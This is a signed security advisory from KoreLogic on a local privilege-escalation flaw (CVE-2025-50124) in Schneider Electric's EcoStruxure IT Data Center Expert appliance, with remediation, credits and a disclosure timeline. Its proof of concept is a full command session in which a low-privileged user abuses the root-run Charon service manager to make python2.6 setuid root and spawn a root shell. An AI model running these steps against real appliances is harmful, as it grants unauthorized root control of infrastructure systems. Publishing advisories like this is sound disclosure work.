-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 KL-001-2025-010: Schneider Electric EcoStruxure IT Data Center Expert Privilege Escalation Title: Schneider Electric EcoStruxure IT Data Center Expert Privilege Escalation Advisory ID: KL-001-2025-010 Publication Date: 2025-07-09 Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2025-010.txt 1. Vulnerability Details Affected Vendor: Schneider Electric Affected Product: EcoStruxure IT Data Center Expert Affected Version: 8.3 and prior Platform: CentOS CWE Classification: CWE-266: Incorrect Privilege Assignment CVE ID: CVE-2025-50124 2. Vulnerability Description The Data Center Expert ("DCE") appliance contains a Charon executable that can be used by a low-privileged attacker to obtain root privileges. The Charon executable and configuration appears to be a local method for adding and removing services that run within the DCE appliance. 3. Technical Description The low-privilege user accounts that come by default on the DCE appliance are restricted to very specific functions and limited shell/menu interfaces. Arbitrary or customer-specific low-privileged user accounts do not appear to be permitted by design in the DCE appliance. However, if a low-privileged shell is obtained by some method, the Charon executable can be leveraged to obtain root privileges. After having obtained root-level compromise with the Hostname RCE vulnerability in the .bcsetup script (CVE-2025-50123/KL-001-2025-009), researchers added (i.e. useradd) a low-privileged account on the appliance. The idea behind setting up a low-privileged account was to see if there were privilege- escalations paths, in the event that an attacker was able to obtain a low-privileged account/shell on the box. The Charon executable and associated configuration file (/etc/nbc/cerberus.cfg), allow for "start" and "stop" commands that are executed as root. A low-privileged attacker could assign their own Charon "application" with attacker-defined "start" and "stop" commands, as illustrated below. 4. Mitigation and Remediation Recommendation Version 9.0 of EcoStruxure IT Data Center Expert includes fixes for these vulnerabilities and is available upon request from Schneider Electric's Customer Care Center. Refer to https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-189-01&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-189-01.pdf. 5. Credit This vulnerability was discovered by Jaggar Henry and Jim Becher of KoreLogic, Inc. 6. Disclosure Timeline 2024-11-21 : KoreLogic reports vulnerability details to Schneider Electric CPCERT. 2024-11-22 : Vendor acknowledges receipt of KoreLogic's submission. 2024-12-06 : Vendor confirms the reported vulnerability. 2024-12-12 : Vendor requests a meeting with KoreLogic to discuss the timeline of remediation efforts for this vulnerability, as well as for associated submissions from KoreLogic. 2024-12-18 : KoreLogic and Schneider Electric agree to embargo vulnerability details until product update 9.0, circa July, 2025. 2025-01-29 : Vendor provides status update. 2025-03-17 : Vendor provides beta release containing remediation for this and other associated vulnerabilities reported by KoreLogic. 2025-06-20 : Vendor notifies KoreLogic that the publication date for this vulnerability will be 2025-07-08. 2025-07-08 : Vendor public disclosure. 2025-07-09 : KoreLogic public disclosure. 7. Proof of Concept Attacker lists the Charon applications that are currently configured on the appliance: [attacker@xyzzy ~]$ /usr/local/netbotz/nbc/bin/charon list Tue Jun 4 08:37:37 2024 - loading configuration Application # 0 name=NBC pre="NONE" start="/usr/local/netbotz/nbc/bin/central.sh" stop="/usr/local/netbotz/nbc/bin/central.sh stop" sort=15 Attacker adds a new Charon application called "root-it" to the appliance. The application when started, will execute the "/bin/chmod u+s /usr/bin/python2.6" command, and when the application is stopped, it will execute "bin/chmod u-s /usr/bin/python2.6". [attacker@xyzzy ~]$ /usr/local/netbotz/nbc/bin/charon add root-it "/bin/chmod u+s /usr/bin/python2.6" "/bin/chmod u-s /usr/bin/python2.6" 1 NONE Added application root-it The command below shows that the python2.6 executable is not setuid root. [attacker@xyzzy ~]$ ls -al /usr/bin/python2.6 -rwxr-xr-x 2 root root 9032 Aug 18 2016 /usr/bin/python2.6 The cerberus.cfg file contains the Charon applications and their configuration. [attacker@xyzzy ~]$ cat /etc/nbc/cerberus.cfg # # Cerberus Config File # [NBC] sort=15 pre=NONE start=/usr/local/netbotz/nbc/bin/central.sh stop=/usr/local/netbotz/nbc/bin/central.sh stop [root-it] sort=1 pre=NONE start=/bin/chmod u+s /usr/bin/python2.6 stop=/bin/chmod u-s /usr/bin/python2.6 Attacker starts the "root-it" application: [attacker@xyzzy ~]$ /usr/local/netbotz/nbc/bin/charon start root-it Started application root-it with pid 19556 The python2.6 executable is not setuid root. [attacker@xyzzy ~]$ ls -al /usr/bin/python2.6 -rwsr-xr-x 2 root root 9032 Aug 18 2016 /usr/bin/python2.6 A simple python script can leverage the setuid root python2.6 executable to gain a root shell. [attacker@xyzzy ~]$ cat ./root-it.py import os os.setuid(0) os.system("/bin/bash") [attacker@xyzzy ~]$ id uid=503(attacker) gid=503(attacker) groups=503(attacker) [attacker@xyzzy ~]$ /usr/bin/python2.6 ./root-it.py [root@xyzzy ~]# id uid=0(root) gid=503(attacker) groups=503(attacker) [root@xyzzy ~]# exit [attacker@xyzzy ~]$ ls -al /usr/bin/python2.6 -rwsr-xr-x 2 root root 9032 Aug 18 2016 /usr/bin/python2.6 Attacker can stop the "root-it" application to remove setuid root on the python2.6 executable. [attacker@xyzzy ~]$ /usr/local/netbotz/nbc/bin/charon stop root-it Killed application root-it [attacker@xyzzy ~]$ ls -al /usr/bin/python2.6 -rwxr-xr-x 2 root root 9032 Aug 18 2016 /usr/bin/python2.6 The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy -----BEGIN PGP SIGNATURE----- iQJOBAEBCAA4FiEEB12WYZwbVwYTJ/b2DKLsCTlWkekFAmhur2oaHGRpc2Nsb3N1 cmVzQGtvcmVsb2dpYy5jb20ACgkQDKLsCTlWkem1mw/+NpBU5uc7F8/2KA6u9tdK keEWcO4rsSMV+9UBnI+kYzq7D9vrXTJWUKVmKnUr1LNmiVqGMa1Odr3aG/nnpyP7 GgWvOiJmjQzBYrBccr7+gj0UKPSefL1b8VVop5tgbfmxBXqLC6h0bPJOYuOzwPA5 OmxVHEZeqXg3h0c+0VbOYcATtUS7iL5MIuNQftaZYDWHAcGS8ymNf2mLDf94DDX7 yBXk84JgjdYr+q4PGm8hSVAq+bSeInAeOZ+0vVhaXJirbFsZZww5rUzWfzb+xZ4d DlSnkjg5Pa5UELM1XnYwC0EMmkGoHBpt6OyvE5mzsC1B9WbKCEIOomv0ALdCsmTN 1VV0UFD5UU9JJs5u+6g3ej5PhbQ+SHU5eTfFhVYWcj7lD34X/Hpu5X/YyHQMZL4s taSbdUq3O+iDIYLvNjsBj3OQTel5Q8X67z3FKhYv3SoPG+iX5YLA0glChgfEB9B3 dN2HpzGXnJP7FjhUW1o/xI9YlZjC4VQDDiJe/DohvxeRZj+a9XStDP/MmggWpFNl 3etKQnzQCIoxVXfBUoZ+T1Pwh782NgYWyexOPTSj1F5CBcCZHAjqlmHUzita6YGQ DWtPW9gIWWri5TNf4DgbqHzF3LOMuJljtIkiSfo8F/2KYg5SQEUr+jFY13Xgtioz uJnX7bz+sXiJZJPKD6pbD0Q= =L8Pa -----END PGP SIGNATURE-----